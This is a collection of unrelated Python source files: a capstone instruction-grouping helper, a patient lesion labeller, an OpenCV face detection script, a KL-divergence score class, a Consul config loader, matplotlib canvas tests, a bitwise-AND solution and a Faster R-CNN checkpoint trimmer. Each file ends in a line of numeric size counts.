target_inst = target_inst.split(".")[0]
target_inst = target_inst.upper()
for inst in check_list:
if target_inst == inst:
return True
# Check conditional code
if target_inst.startswith(inst):
if len(target_inst) - len(inst) == 2:
for suffix in suffixes:
if target_inst == inst + suffix:
return True
return False
def _init_inst_groups(prefix, target, groups):
insts = list(filter(lambda x: x.startswith(prefix), dir(target)))
inst_map = {}
if prefix == "ARM_INS_":
suffixes = ARM_GRP_COND_CODE
else:
suffixes = []
for inst in insts:
inst_no = getattr(target, inst)
inst = inst.replace(prefix, "")
inst_map[inst_no] = []
for group_no, grouped_insts in groups.items():
if _check_inst(inst, grouped_insts, suffixes):
inst_map[inst_no].append(group_no)
if not inst_map[inst_no]:
inst_map[inst_no].append(GRP_NAME_MAP["unknown"])
return inst_map
def _init_groups():
import capstone
x86 = _init_inst_groups("X86_INS_", capstone.x86, X86_GRP_MAP)
arm = _init_inst_groups("ARM_INS_", capstone.arm, ARM_GRP_MAP)
arm64 = _init_inst_groups("ARM64_INS_", capstone.arm64, ARM64_GRP_MAP)
mips = _init_inst_groups("MIPS_INS_", capstone.mips, MIPS_GRP_MAP)
ppc = _init_inst_groups("PPC_INS_", capstone.ppc, PPC_GRP_MAP)
return x86, arm, arm64, mips, ppc
X86_INST_MAP, ARM_INST_MAP, ARM64_INST_MAP, MIPS_INST_MAP, PPC_INST_MAP = _init_groups()
| 28,253 | 14,455 |
"""Routines for handling patient lists."""
# TODO: Some functions from dwi.compat should be replaced with something better
# here, they're still used by tools/{roc_auc,correlation}.py.
from .types import GleasonScore
def label_lesions(patients, thresholds=None):
"""Label lesions according to score groups."""
# Alternative: np.searchsorted(thresholds, [x.score for x in l])
if thresholds is None:
thresholds = GleasonScore.THRESHOLDS_STANDARD
thresholds = [GleasonScore(x) for x in thresholds]
lesions = (l for p in patients for l in p.lesions)
for l in lesions:
l.label = sum(l.score > x for x in thresholds)
def keep_scan(patients, i):
"""Discard other scans except index i. NOTE: Changes the structure."""
for p in patients:
p.scans = [p.scans[i]]
| 814 | 267 |
def getUser():
return "Sanghak,Lee / http://sanghaklee.tistory.com" #FIXME: | 79 | 34 |
import sys
import cv2
import os, os.path
import ColorClustering
import numpy as np
from PIL import Image
from pytesser import *
from sklearn.cluster import KMeans
from sklearn.externals import joblib
def find_most_Color(im, clusters):
imBodyRGB = cv2.cvtColor(im, cv2.COLOR_BGR2RGB)
imBodyRGB = imBodyRGB.reshape((imBodyRGB.shape[0] * imBodyRGB.shape[1], 3))
clt = KMeans(n_clusters=clusters)
clt.fit(imBodyRGB)
hist = ColorClustering.centroid_histogram(clt)
bar = ColorClustering.plot_colors(hist, clt.cluster_centers_)
return bar
for root, _, files in os.walk('image/'):
for f in files:
imagePath = os.path.join(root, f)
if 'tmp' in imagePath: continue
cascPath = 'haarcascade_frontalface_default.xml'
faceCascade = cv2.CascadeClassifier(cascPath)
image = cv2.imread(imagePath)
imHeight, imWidth, channels = image.shape
cv2.putText(image, '%ix%i' %(imWidth,imHeight), (50, 50),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
faces = faceCascade.detectMultiScale(
gray,
scaleFactor=1.1,
minNeighbors=5,
minSize=(30, 30),
flags=cv2.cv.CV_HAAR_SCALE_IMAGE
)
for facesCount, (fx, fy, fw, fh) in enumerate(faces):
faceCom = imWidth/10 if imWidth>imHeight else imHeight/10
if faceCom - fh > 50 or faceCom - fh < -30: continue
cv2.rectangle(image, (fx, fy), (fx + fh, fy + fh), (0, 255, 0), 2)
cv2.putText(image, 'face: %i' %(facesCount), (fx, fy + fh),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
cv2.putText(image, 'size: %i:%i' %(fw,fh), (fx, fy + fh -30),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
cv2.putText(image, 's.comp: %i ' %(faceCom), (fx, fy + fh -60),cv2.FONT_HERSHEY_DUPLEX, 1, (0, 0, 255), 2)
bodyY = fy+(fh*2)
bodyX1 = fx - fw / 3
bodyX1 = 0 if bodyX1 < 0 else bodyX1
imBody = image[fy + (fh*2):fy + (fh * 5), bodyX1:fx + fw + (fw / 3)]
cv2.rectangle(image, (bodyX1, fy + (fh*2)), (fx + fw + (fw / 3), fy + (fh * 5)), (0, 255, 255), 2)
gray = cv2.cvtColor(imBody, cv2.COLOR_BGR2GRAY)
blur = cv2.GaussianBlur(gray, (9, 9), 0)
thresh = cv2.adaptiveThreshold(blur, 255, 1, 1, 11, 2)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_LIST, cv2.CHAIN_APPROX_SIMPLE)
dicBody = {}
dicTmp = {}
dicBest = {}
for cntCount, cnt in enumerate(contours):
[cx,cy,cw,ch] = cv2.boundingRect(cnt)
if cv2.contourArea(cnt) > 28 and (fh / 5) < ch < (fh / 2) and cw < (fw / 2) :
cv2.rectangle(imBody, (cx, cy), (cx + cw, cy + ch), (0, 0, 255), 2)
poin = np.array([cx,cy,cw,ch])
numBar = find_most_Color(imBody[cy:cy + ch, cx:cx + cw], 2)
dicBody[cntCount] = (poin,numBar[0][0],numBar[0][len(numBar[0]) - 1])
for cont in dicBody:
x = dicBody[cont][0][0]
y = dicBody[cont][0][1]
h = dicBody[cont][0][3]
c1 = dicBody[cont][1]
c2 = dicBody[cont][2]
clc1 = c1 if c1[0] > c2[0] else c2
for c2Count, cont2 in enumerate(dicBody):
xl = dicBody[cont2][0][0]
yl = dicBody[cont2][0][1]
hl = dicBody[cont2][0][3]
cl1 = dicBody[cont2][1]
cl2 = dicBody[cont2][2]
clc2 = cl1 if cl1[0] > cl2[0] else cl2
clcl = int(clc1[0]) - int(clc2[0])
if yl - 10 < y < yl + 10 and xl - 200 < x < xl + 200 and hl - 5 < h < hl + 5 and abs(clcl) < 10:
dicTmp[c2Count] = dicBody[cont2]
if len(dicTmp) > len(dicBest) and len(dicTmp) > 1:
dicBest = dicTmp
dicTmp = {}
minX = 999999
maxX = 0
minY = 999999
maxY = 0
for rec in dicBest:
[rx, ry, rw, rh] = dicBest[rec][0]
if minX > rx:
minX = rx
if minY > ry:
minY = ry
if maxY < ry+rh:
maxY = ry+rh
if maxX < rx+rw:
maxX = rx+rw
if minX <999999 and maxX >0:
imgNum = imBody[minY:maxY, minX:maxX]
cv2.rectangle(imBody, (minX+2, minY+2), (maxX+2, maxY+2), (255, 0, 255), 2)
# cv2.imshow(str(facesCount),imBody)
# cv2.imshow('num'+str(facesCount),imgNum)
cv2.namedWindow("main", cv2.cv.CV_WINDOW_NORMAL)
imageWinSize = cv2.resize(image, (imWidth/2, imHeight/2))
while True:
cv2.imshow("main", imageWinSize)
key = cv2.waitKey(1) & 0xFF
if key == ord("w"):
break
elif key == ord("q"):
cv2.destroyAllWindows()
sys.exit() | 5,039 | 2,092 |
import numpy as np
from scipy.stats import entropy
import matplotlib.pyplot as plt
import matplotlib.colors as colors
import seaborn as sns
import sciunit
class kl_divergence(sciunit.Score):
"""
Kullback-Leibner Divergence D_KL(P||Q)
Calculates the difference of two sampled distributions P and Q in form of
an entropy measure. The D_KL measure is effectively the difference of the
cross-entropy of the of both distribution P,Q and the entropy of P.
D_KL can be interpreted as the amount of information lost when
approximating P by Q.
. math $$ D\mathrm{KL}(P||Q) =\sum{i} P(i) \log_2 \frac{P(i)}{Q(i)}
= H(P,Q) - H(P) $$
The returned score is the symmetric version of the kl divergence
. math $$ D_\mathrm{KL}(P,Q) := \frac{1}{2} \left(D_\mathrm{KL}(P|Q) +
D_\mathrm{KL}(Q|P)\right)$$
Parameters
----------
kl_binsize : float
Bin size of the histogram, used to calculate the KL divergence.
"""
score = np.nan
@classmethod
def compute(self, data_sample_1, data_sample_2, kl_binsize=0.005, **kwargs):
# filtering out nans
sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)]
sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)]
max_value = max([max(sample1),max(sample2)])
min_value = min([min(sample1),min(sample2)])
bins = (max_value - min_value) / kl_binsize
edges = np.linspace(min_value, max_value, bins)
P, edges = np.histogram(sample1, bins=edges, density=True)
Q, _____ = np.histogram(sample2, bins=edges, density=True)
# dx = np.diff(edges)[0]
# edges = edges[:-1]
# P *= dx
# Q *= dx
init_len = len(P)
Qnot0 = np.where(Q != 0.)[0]
P_non0 = P[Qnot0]
Q_non0 = Q[Qnot0]
Pnot0 = np.where(P_non0 != 0.)[0]
Q_non0 = Q_non0[Pnot0]
P_non0 = P_non0[Pnot0]
final_len = len(P_non0)
discard = init_len - final_len
D_KL_PQ = entropy(P_non0, Q_non0, base=2)
D_KL_QP = entropy(Q_non0, P_non0, base=2)
D_KL = .5 * (D_KL_PQ + D_KL_QP)
self.score = kl_divergence(D_KL)
self.score.data_size = [len(sample1), len(sample2)]
self.score.discarded_values = discard
self.score.bins = len(edges)-1
return self.score
@classmethod
def plot(self, data_sample_1, data_sample_2, ax=None, palette=None,
var_name='Measured Parameter', kl_binsize=0.005,
sample_names=['observation', 'prediction'], **kwargs):
if ax is None:
fig, ax = plt.subplots()
ax.set_ylabel('Probability Density')
ax.set_xlabel(var_name)
if palette is None:
palette = [sns.color_palette()[0], sns.color_palette()[1]]
sample1 = np.array(data_sample_1)[np.isfinite(data_sample_1)]
sample2 = np.array(data_sample_2)[np.isfinite(data_sample_2)]
max_value = max([max(sample1),max(sample2)])
min_value = min([min(sample1),min(sample2)])
bins = (max_value - min_value) / kl_binsize
edges = np.linspace(min_value, max_value, bins)
P, edges = np.histogram(sample1, bins=edges, density=True)
Q, _____ = np.histogram(sample2, bins=edges, density=True)
dx = np.diff(edges)[0]
edges = edges[:-1]
xvalues = edges + dx/2.
xvalues = np.append(np.append(xvalues[0]-dx, xvalues), xvalues[-1]+dx)
def secure_log(E, D):
log = np.zeros_like(E)
i = 0
for e, d in zip(E, D):
if e == 0 or d == 0:
log[i] = 0.
else:
log[i] = np.log(e/d)
i += 1
return log
diffy = .5 * (P - Q) * secure_log(P, Q.astype(float))
P = np.append(np.append(0, P), 0)
Q = np.append(np.append(0, Q), 0)
filly = np.append(np.append(0., diffy), 0.)
ax.fill_between(xvalues, filly, 0, color='0.8', label='d/dx DKL')
if palette is None:
palette = [sns.color_palette()[0], sns.color_palette()[1]]
ax.plot(xvalues, P, lw=2, color=palette[0], label=sample_names[0])
ax.plot(xvalues, Q, lw=2, color=palette[1], label=sample_names[1])
ax.set_xlim(xvalues[0], xvalues[-1])
ax.set_yscale('log')
plt.legend()
return ax
@property
def sort_key(self):
return self.score
def __str__(self):
return "\n\n\033[4mKullback-Leibler-Divergence\033[0m" \
+ "\n\tdatasize: {} \t {}" \
.format(self.data_size[0], self.data_size[1]) \
+ "\n\tdiscarded: {}" \
.format(self.discarded_values) \
+ "\n\tD_KL = {:.3f} \t bins = {}\n\n" \
.format(self.score, self.bins) | 4,920 | 1,832 |
import base64
import io
import requests
import yaml
from kikyo import Kikyo, Settings
def configure_by_consul(config_url: str, **kwargs) -> Kikyo:
"""从Consul拉取YAML格式的配置文件
:param config_url: 获取配置项的URL地址
"""
resp = requests.get(config_url)
resp.raise_for_status()
settings = Settings()
for data in resp.json():
v = data['Value']
if not v:
continue
s = base64.b64decode(v)
conf: dict = yaml.safe_load(io.BytesIO(s))
if 'kikyo' in conf:
settings.merge(conf['kikyo'])
break
settings.merge(kwargs)
return Kikyo(settings)
| 635 | 228 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
""" Test case for Energy Profle Canvas.
"""
import unittest
import matplotlib.pyplot as plt
from catplot.ep_components.ep_canvas import EPCanvas
from catplot.ep_components.ep_lines import ElementaryLine
from catplot.ep_components.ep_chain import EPChain
class EPCanvasTest(unittest.TestCase):
def setUp(self):
self.maxDiff = True
def test_construction_and_query(self):
""" Test we can construct ElementaryLine object correctly.
"""
canvas = EPCanvas(margin_ratio=0.2)
self.assertEqual(canvas.margin_ratio, 0.2)
self.assertIsNone(canvas.figsize)
self.assertIsNone(canvas.dpi)
self.assertIsNone(canvas.facecolor)
self.assertIsNone(canvas.edgecolor)
self.assertListEqual(canvas.lines, [])
self.assertListEqual(canvas.shadow_lines, [])
self.assertTrue(canvas.figure)
self.assertTrue(canvas.axes)
# Check invalid reaction equation.
self.assertRaises(ValueError, EPCanvas, margin_ratio=-0.1)
plt.close(canvas.figure)
def test_draw(self):
""" Make sure the lines can be added without exceptions.
"""
canvas = EPCanvas()
line = ElementaryLine([0.0, 1.3, 0.8])
canvas.add_lines([line])
canvas.draw()
plt.close(canvas.figure)
def test_add_species_annotations(self):
""" Make sure the species annotations can be added without exceptions.
"""
canvas = EPCanvas()
line = ElementaryLine([0.0, 1.3, 0.8],
rxn_equation="CO_b + O_b <-> CO-O_2b -> CO2_g + 2*_b")
canvas.add_lines([line])
canvas.add_species_annotations(line)
plt.close(canvas.figure)
def test_add_horizontal_auxiliary_line(self):
""" Make sure the horizontal line can be added without exceptions.
"""
canvas = EPCanvas()
line = ElementaryLine([0.0, 1.3, 0.8])
canvas.add_lines([line])
canvas.add_horizontal_auxiliary_line(line)
plt.close(canvas.figure)
def test_add_vertical_auxiliary_line(self):
""" Make sure the vertical line can be added without exceptions.
"""
canvas = EPCanvas()
line = ElementaryLine([0.0, 1.3, 0.8])
canvas.add_lines([line])
canvas.add_vertical_auxiliary_lines(line)
plt.close(canvas.figure)
def test_add_energy_annotations(self):
""" Make sure the energy annotations can be added correctly.
"""
canvas = EPCanvas()
line = ElementaryLine([0.0, 1.3, 0.8])
canvas.add_lines([line])
canvas.add_energy_annotations(line)
plt.close(canvas.figure)
def test_add_chain(self):
""" Test energy profile chain can be added correctly to canvas.
"""
canvas = EPCanvas()
self.assertFalse(canvas.lines)
self.assertFalse(canvas.chains)
l1 = ElementaryLine([0.0, 1.2, 0.6])
l2 = ElementaryLine([0.0, 1.0, 0.8])
chain = EPChain([l1, l2])
canvas.add_chain(chain)
self.assertEqual(len(canvas.lines), 2)
for l in canvas.lines:
self.assertTrue(isinstance(l, ElementaryLine))
self.assertEqual(len(canvas.chains), 1)
self.assertTrue(isinstance(canvas.chains[0], EPChain))
# Exception is expected if add the chain again.
self.assertRaises(ValueError, canvas.add_chain, chain)
plt.close(canvas.figure)
def test_contains(self):
canvas = EPCanvas()
l1 = ElementaryLine([0.0, 1.2, 0.6])
l2 = ElementaryLine([0.0, 1.0, 0.8])
chain = EPChain([l1])
canvas.add_chain(chain)
self.assertTrue(l1 in canvas)
self.assertTrue(chain in canvas)
self.assertFalse(l2 in canvas)
plt.close(canvas.figure)
def test_add_line(self):
""" Test the line can be add to canvas correctly.
"""
canvas = EPCanvas()
l1 = ElementaryLine([0.0, 1.2, 0.6])
canvas.add_line(l1)
# Add repeat line, exception raises.
self.assertRaises(ValueError, canvas.add_line, l1)
plt.close(canvas.figure)
def test_add_lines(self):
canvas = EPCanvas()
l1 = ElementaryLine([0.0, 1.2, 0.6])
l2 = ElementaryLine([0.0, 1.0, 0.8])
canvas.add_lines([l1, l2])
canvas.lines = []
self.assertRaises(ValueError, canvas.add_lines, [l1, l1])
plt.close(canvas.figure)
def test_add_all_horizontal_auxiliary_lines(self):
""" Make sure we can add all horizontal auxiliary lines to canvas.
"""
canvas = EPCanvas()
l1 = ElementaryLine([0.0, 1.2, 0.6])
l2 = ElementaryLine([0.0, 1.0, 0.8])
canvas.add_lines([l1, l2])
canvas.add_all_horizontal_auxiliary_lines()
plt.close(canvas.figure)
if "__main__" == __name__:
suite = unittest.TestLoader().loadTestsFromTestCase(EPCanvasTest)
unittest.TextTestRunner(verbosity=2).run(suite)
| 5,077 | 1,660 |
"""
# BITWISE AND OF NUMBERS RANGE
Given a range [m, n] where 0 <= m <= n <= 2147483647, return the bitwise AND of all numbers in this range, inclusive.
Example 1:
Input: [5,7]
Output: 4
Example 2:
Input: [0,1]
Output: 0
"""
class Solution:
def rangeBitwiseAnd(self, m: int, n: int) -> int:
count = 0
while m < n:
m = m >> 1
n = n >> 1
count += 1
return m << count | 458 | 177 |
GET_FROM_REDDIT = 1
| 20 | 12 |
import torch
import numpy as np
num_classes = 25
model_coco = torch.load(r"/media/alvinai/Documents/model/faster_rcnn_r50_fpn_1x_20190610-bf0ea559.pth")
# print(model_coco)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# a = model_coco["state_dict"]["rpn_head.rpn_cls.weight"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.weight"], 0, values=a, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.weight"].shape)
# b=model_coco["state_dict"]["rpn_head.rpn_cls.bias"][0]
# model_coco["state_dict"]["rpn_head.rpn_cls.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_cls.bias"], 0, values=b, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_cls.bias"].shape)
# c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][0].repeat(4,1,1,1)
# model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][1]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][2]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# # c= model_coco["state_dict"]["rpn_head.rpn_reg.weight"][3]
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"]=np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.weight"], 0, values=c, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.weight"].shape)
# d=model_coco["state_dict"]["rpn_head.rpn_reg.bias"][0].repeat(4,)
# model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = np.insert(model_coco["state_dict"]["rpn_head.rpn_reg.bias"], 0, values=d, axis=0)
# print(model_coco["state_dict"]["rpn_head.rpn_reg.bias"].shape)
# # model_coco["state_dict"]["rpn_head.rpn_reg.weight"] = model_coco["state_dict"]["rpn_head.rpn_reg.weight"].repeat(2,1,1,1)
# # model_coco["state_dict"]["rpn_head.rpn_reg.bias"] = model_coco["state_dict"]["rpn_head.rpn_reg.bias"].repeat(2,)
# weight
model_coco["state_dict"]["bbox_head.fc_cls.weight"] = model_coco["state_dict"]["bbox_head.fc_cls.weight"][
:num_classes, :]
model_coco["state_dict"]["bbox_head.fc_reg.weight"] = model_coco["state_dict"]["bbox_head.fc_reg.weight"][
:num_classes*4, :]
# bias
model_coco["state_dict"]["bbox_head.fc_cls.bias"] = model_coco["state_dict"]["bbox_head.fc_cls.bias"][:num_classes]
model_coco["state_dict"]["bbox_head.fc_reg.bias"] = model_coco["state_dict"]["bbox_head.fc_reg.bias"][:num_classes*4]
# save new model
torch.save(model_coco, r"/media/alvinai/Documents/underwater/model/libra_faster_rcnn_r50_fpn_1x_cls_%d.pth" % num_classes)
| 2,955 | 1,317 |